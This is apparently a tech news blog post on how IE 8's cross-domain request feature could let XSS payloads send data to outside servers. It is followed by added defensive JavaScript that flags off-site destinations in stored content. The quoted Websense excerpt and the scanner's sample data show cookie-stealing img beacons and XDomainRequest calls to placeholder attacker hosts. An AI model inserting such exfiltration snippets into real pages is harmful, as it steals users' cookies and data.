IE 8: Cross scripting defense a double-edged sword


Update: As most of the tech world knows, IE 8 has landed with its first beta, but the security improvements may raise some other issues to ponder.

Folks--especially security researchers--are kicking the tires on IE 8 (all resources) and finding a few problems that go along with Microsoft's protection enhancements.

For instance, Websense homes in on IE 8's cross domain request restrictions. Frankly, Websense's post is a bit over my head, but the money excerpt is notable.

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<img src="http://bad guy.com/steal.php?cookie=" + cookie />

The <img> tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest();
xdr.open("POST", "http://www.bad guy.com/");
xdr.send(stolenInfo);

With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these.

This statement on IE 8 just illustrates the security arms race. Vendors race to patch, protect and enhance their software to lock out threats. But those threats just keep evolving. By the time IE 8 clears its beta hurdles, there will be new threats to take advantage of whatever scheme Microsoft has cooked up.

Update: Tweaked the headline. Websense got back to me with the following clarification. In a nutshell, I goofed. Websense clarifies:

The new ability of cross-domain requests does not really increase the attack surface, but simply provides an additional, easier means to communicate externally. As you can see this provides benefits not only to developers but to malicious folks as well.
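Websense's point that the `<img>` beacon and the XDR call are two routes to the same off-site request can be seen from the reviewing side. The following is an added example, not code from the article or from Websense: a helper that lists every off-site destination in a piece of stored user content, whichever channel would carry it. The function names, host names and sample content are assumptions made for illustration.

```javascript
// Added example: not code from the article or from Websense's post.
// Host names and the sample content are constructed (*.example is reserved).
const IMG_SRC = /<img\b[^>]*?\bsrc\s*=\s*(["'])(.*?)\1/gi;
const SCRIPT_OPEN = /\.open\s*\(\s*(["'])[A-Za-z]+\1\s*,\s*(["'])(.*?)\2/g;

// Resolve a destination against the page origin; null means "could not parse".
function hostOf(url, pageOrigin) {
  try {
    return new URL(url, pageOrigin).hostname.toLowerCase();
  } catch (err) {
    return null;
  }
}

// List every destination in `content` that is neither the page's own host
// nor on the allowlist, whichever channel would carry the request.
function findExternalDestinations(content, pageOrigin, allowedHosts) {
  const allowed = new Set(
    [new URL(pageOrigin).hostname, ...allowedHosts].map((h) => h.toLowerCase())
  );
  const findings = [];
  const record = (channel, url) => {
    const host = hostOf(url, pageOrigin);
    // Unparseable destinations are reported too, so a reviewer sees them.
    if (host === null || !allowed.has(host)) findings.push({ channel, url, host });
  };
  for (const m of content.matchAll(IMG_SRC)) record("img", m[2]);
  for (const m of content.matchAll(SCRIPT_OPEN)) record("script-request", m[3]);
  return findings;
}

// Constructed sample: stored user-submitted content awaiting review.
const SAMPLE_CONTENT = [
  '<p>Great article</p><img src="/static/smiley.png">',
  '<img src="https://cdn.shop.example/banner.png">',
  '<img src="http://collector.example/steal.php?cookie=abc">',
  '<script>var xdr = new XDomainRequest();',
  'xdr.open("POST", "http://www.collector.example/"); xdr.send(info);</script>',
].join("\n");

const report = findExternalDestinations(
  SAMPLE_CONTENT, "https://shop.example", ["cdn.shop.example"]
);
console.log(report);
```

Pattern matching of this kind misses obfuscated script, so it is a triage aid for stored content; closing the injection hole itself is what removes both channels.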

Topics: Security, Browser, Microsoft

About

Larry Dignan is Editor in Chief of ZDNet and SmartPlanet as well as Editorial Director of ZDNet's sister site TechRepublic. He was most recently Executive Editor of News and Blogs at ZDNet. Prior to that he was executive news editor at eWeek and news editor at Baseline. He also served as the East Coast news editor and finance editor at CN...
